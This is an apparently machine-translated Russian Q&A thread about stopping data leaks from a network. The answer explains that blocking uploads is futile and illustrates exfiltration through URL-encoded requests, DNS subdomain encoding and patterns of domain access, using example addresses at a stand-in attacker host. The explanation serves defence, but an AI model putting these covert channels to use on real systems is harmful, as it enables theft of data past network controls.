Я хочу, чтобы моя сеть была защищена, поэтому загрузка, подключение по почте или другие утечки будут запрещены.

Я попробовал исходящее правило брандмауэра Windows. Но это заставляет закрыть все соединения. Не работает для меня

Пожалуйста, сообщите мне, если есть какой-либо плагин /addOn, чтобы предотвратить загрузку файла браузера / протокол или использование Windows, чтобы запретить загрузку файла.

Спасибо за интересную мою проблему.

1 ответ1

2

Итак, вы хотите предотвратить передачу информации из вашей сети извне вашей сети (например, в Интернет)?

Если компьютер может получить доступ к Интернету из вашей сети (например, если он может просматривать веб-страницы), то предотвращение утечки информации в Интернет практически невозможно.

Позвольте мне привести несколько примеров того, как данные могут быть утечки:

Электронная почта и загрузка

Это то, что вы пытаетесь предотвратить. Можно было бы предотвратить это, но бесполезно, так как есть много других способов.

Утечка закодированного URL

Злоумышленник может использовать любой браузер для доступа к URL-адресам в такой форме:

http://attacker-domain.net/leak-some-data/DATA-THAT-SHOULD-BE-LEAKED

Ему нужен только специальный сервер, который настроен на сохранение всех запросов.

Утечка в кодировке DNS

Злоумышленник может использовать DNS для утечки информации. С помощью любой программы на вашем компьютере, которая имеет доступ в Интернет. Просто заставьте программу попытаться связаться с адресом, подобным этому:

DATA-THAT-SHOULD-BE-LEAKED.attacker-domain.net

Это приведет к запросу DNS с вашего компьютера на сервер DNS. Затем запрос перенаправляется на DNS-сервер attacker-domain.net . Таким образом, злоумышленнику нужен только модифицированный DNS-сервер, который регистрирует полученные запросы.

Кодирование данных в шаблонах запросов

Злоумышленнику потребуется более одного домена / адреса. Для утечки информации он может использовать схему доступа к этим доменам. Например, чтобы пропустить слово "привет", он мог бы использовать простой браузер и получить доступ к доменам, которые он контролирует, в определенном порядке:

h-attacker-domain.net

e-attacker-domain.net

l-attacker-domain.net

l-attacker-domain.net

o-attacker-domain.net

Очевидно, что можно также использовать двоичный код или иметь несколько доменов, означающих одно и то же и т.д. И т.д.

Заключение

Это лишь некоторые из многих методов, которые злоумышленник может использовать для передачи информации во внешний мир. Очевидно, что можно объединить некоторые из этих методов, а также использовать шифрование и / или запутывание, чтобы затруднить обнаружение.

Поэтому предотвращение загрузки через браузер более или менее бесполезно.

Всё ещё ищете ответ? Посмотрите другие вопросы с метками .